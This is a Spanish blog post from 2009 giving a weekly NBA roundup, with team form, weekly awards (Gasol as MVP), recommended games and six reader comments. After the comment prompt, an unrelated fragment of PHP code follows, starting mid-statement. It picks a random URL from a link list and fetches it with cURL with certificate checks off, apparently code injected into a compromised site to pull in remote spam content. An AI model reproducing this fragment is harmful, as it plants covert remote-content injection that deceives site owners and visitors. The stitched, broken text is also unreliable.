INFORME SEMANAL TJNBA (Semana 15)

09 de February de 2009 por TheDeerHunter

La semana ha estado marcada por la cantidad y alcance de lesiones determinantes en el devenir de la competición. A hombres como Paul, Bynum, Nelson, Terry, Brand, Biedrins, Dunleavy o Bogut seguro que les echarán en falta sus respectivos equipos durante el tiempo en el que no estén disponibles.

También ha sido una semana de duelos por todo lo alto. Más concretamente, la semana del enfrentamiento cuadrangular de los gallos de ambas conferencias y, sobre todo, del duelo individual entre LeBron y Kobe, directa e indirectamente, con sus memorables actuaciones en el Madison incluidas.

Vamos a ello…

ON FIRE

Los Lakers han vivido su momento dicotómico de la temporada. Ha coincidido la confirmación de otra larga ausencia de Bynum con el momento más arrollador de los amarillos. Pero tampoco nos engañemos, ya que la situación queda reflejada en el increíble estado de forma de Odom: Motivación, intensidad… pero ni Dios se cree que vaya a ser una constante con el paso de las semanas. En cualquier caso, que les quiten lo bailao a los amarillos de haberle mojado la cara a domicilio a sus dos máximos rivales en el Este. Y como guinda, Radmanovic con lacito por Adam Morrison y Shannon Brown. Cuidado que los Lakers cuentan en sus filas con “el Magic Chino” y “el nuevo Bird“. Ya les queda menos para completar una nueva y exótica versión del Dream Team.

En toda la liga nadie más ha logrado terminar la semana inmaculada, pero hay equipos de los que sí podemos decir que han hecho los deberes.

Los Nuggets empezaron la semana tumbando a los Spurs, con los que habrían recortado distancias de no haberse cruzado con los mejores Nets de las últimas semanas. Éstos vuelven a plaza de Playoffs de la mano de la mejor pareja interior de rookies de la liga. Deberían rezar para que finalmente no traspasen a Vicente.

Dallas, Utah y Suns también han logrado una semana bastante positiva, aunque el precio para los Mavericks ha sido perder a Terry, que no es poco.

AL TRAN-TRAN

Semana tran-tranera para todo el Este en general. Orlando pierde mucho fuelle con la lesión de Nelson y su ausencia hace más difícil todavía considerarlos candidatos. Por su parte, Boston y Cleveland han sufrido dolorosas derrotas en casa y deberían mover ficha.

El resto de equipos de la Conferencia con balance positivo (Atlanta, Detroit, Miami y Philadelphia) han pasado una semana irregular. El pulso este-oeste vuelve a normalizarse.

En el Oeste, los Spurs siguen en buena línea tras su brillante victoria de anoche en Boston. New Orleans, sin embargo, está cogidos por los pelos… por los de CP3, al que no van a ver en una temporada, hecho que pueden pagar muy caro. Houston o Portland también estuvieron bastante flojos y por detrás aprietan fuerte.

Llama la atención que uno de los equipos de la semana ha sido Memphis, y eso que perdieron contra los Clippers. Efecto post-Iavaronni, supongo.

EL BORDE DEL ABISMO

La semana negra del Este no sólo ha tenido lugar en puestos de Playoffs. La distancia entre los aspirantes y el resto ha crecido súbitamente con el buen hacer de New Jersey y las debacles de Milwaukee, New York o Indiana. Chicago a duras penas se mantiene a tiro.

En el Oeste, buena semana de Golden State, ganando a varios grandes, y de unos Clippers que han recuperado gran parte de sus lesionados. De poco les va a servir.

Regular para Oklahoma y Minnesotta, pero al menos han sumado.

EL POZO

Calderón y sus Raptors se van irremediablemente para abajo. Se encuentran en medio de la tormenta y sólo cambios traumáticos los sacarían de ella. Los experimentos de Brown en Charlotte tampoco terminan de cuajar y parece que ya están a punto de caramelo para terminar claudicando por el Nº1.

Kings y Wizards se mantienen constantes en la cola de la clasificación con únicamente 11 victorias. La última de Washington, anoche mismo contra Indiana.

PREMIOS SEMANALES

MVP: Nos vamos a permitir darle el premio al jugador más valioso de la pasada semana a Pau Gasol, quien ante la baja de Bynum ha sido capaz de dar un paso adelante en todos los aspectos y reclamar así su jerarquía en el juego de los Lakers. En una semana que se presentaba de máxima dificultad para los angelinos, Gasol ha contribuido a las cuatro victorias de su equipo promediado 26 puntos con un 63.5% de acierto en tiros de campo y un 77.4 en libres, además de casi 14 rebotes, 4.5 asistencias, 1.5 tapones y 1 robo.

El rookie: Los Grizzlies han firmado una de sus mejores semanas de la temporada y han de agradecérselo a OJ Mayo, que decepcionó en la derrota ante los Clippers pero fue decisivo en los triunfos ante Raptors, Rockets y Wizards. Sus promedios semanales fueron de 22.8 puntos, 4.5 rebotes, 2.5 asistencias y 1.3 recuperaciones.

La sorpresa: Aunque sólo sea por su descomunal actuación ante los Pistons, el premio va para Ramon Sessions. Sus 44 puntos (13 de 18 en tiros de campo y 18 de 21 en libres), 12 asistencias y 5 rebotes de aquel partido le dejan con unas medias para la semana de 31.5 puntos, 9 asistencias y 4 rebotes.

La decepción: Nos encanta Rodney Stuckey pero su semana ha sido desastrosa, salvo en la victoria ante los Heat. El joven jugador de los Pistons ha promediado 10.7 puntos con menos de un 40% de acierto en los tiros, incluyendo un 1 de 10 precisamente ante los Bucks de  Sessions.

RAZONES PARA TRASNOCHAR

En la madrugada del lunes al martes se disputarán cuatro partidos, de entre los cuáles destacamos el siguiente:

Suns @ Sixers. Los de Arizona llegan al partido con más urgencias que los locales, puesto que su margen de error es mucho menor. Además, los Suns andan envueltos en rumores de traspaso de Amaré, quien ha realizado unas polémicas declaraciones desentendiéndose de cualquier responsabilidad sobre el grupo. Los Sixers los recibirán con las ideas mucho más claras después de la operación de Brand, que tendrá al ala-pívot de baja hasta la próxima temporada.  El partido se iniciará a la 1:00 de la madrugada, hora peninsular.

El jugador al que recomendamos seguir de cerca es… Tracy McGrady. Tras un nuevo raje de Rafer Alston (esta vez por la escasa intensidad y seriedad con que algunos compañeros se toman los entrenamientos), cabría esperar un paso adelante por parte de T-Mac esta noche a las 2:00 horas frente a los Bucks. Seguro que Adelman se lo agradecería.

Comenta

6 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    El de anoche fue, posiblemente, el mejor partido de Odom desde que está en los Lakers. Realmente dominó la segunda mitad. La verdad es que los Lakers han dado una gran demostración de solidez física y mental, algo que siempre les hemos discutido.

    Por lo demás, parece que la liga está como esperando el parón del All Star. Muchas bajas de jugadores importantes. Eso y los traspasos (a ver cuánto tardan los Suns en empaquetar a Amaré o a Shaq) pueden cambiar el panorama.

      Citar

  2. Llukas 70 dice:
    #2

    Sin duda es lo que dice Magic. Odom ha jugado el mejor partido de su vida desde que esta en los Lakers. I sobretodo fue en el tercer cuarto que es cuando demostro que tambien se puede contar con el cuando bryant o gasol no pueden ejercer de lideres. Sinceramente ayer Odom lo hizo todo bien, muy bien.

    Por otra parte el duelo Braynt-Lebron decepciono un poco, pero no siempre se puede pedir tanto.

      Citar

  3. toni dice:
    #3

    Ayer Odom se estuvo riendo todo el 3er cuarto de Varejao, fue descomunal.
    Pau tiene una virtud, que aunque no tenga su dia en el tiro, mueve al equipo como nadie, ayer dio 6ast y fue el motor del equipo junto a Odom al que le llegavan todas.
    Kobe estaba enfermito, pero el tiro que le metió a leBron tras el reverso…IMPRESIONANTE!
    Gran partido ayer de todos los lakers!
    En esta semana, ha qedado demostrado que los lakers pueden ser campeones perfectamente(han ganado a cavs y celtics, favoritos en el este), ya solo falta que luego no pierdan la concentracion.

      Citar

  4. Fran Reyes dice:
    #4

    En el Portland – New York de ayer, buenísimo partido de Sergio Rodríguez con 16 puntos y 6 asistencias, 37 minutos de juego por apenas diez de Bayless. Y el final, bastante chungo con los un parcial de 8-0 a favor de los Blazers con buzzer-beater de Roy incluido

      Citar

  5. Drheam dice:
    #5

    Momento idoneo para el traspaso de Odom.. D

      Citar

  6. Noelinho dice:
    #6

    Por cierto, MVPs de la semana para Gasol y Lebron.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>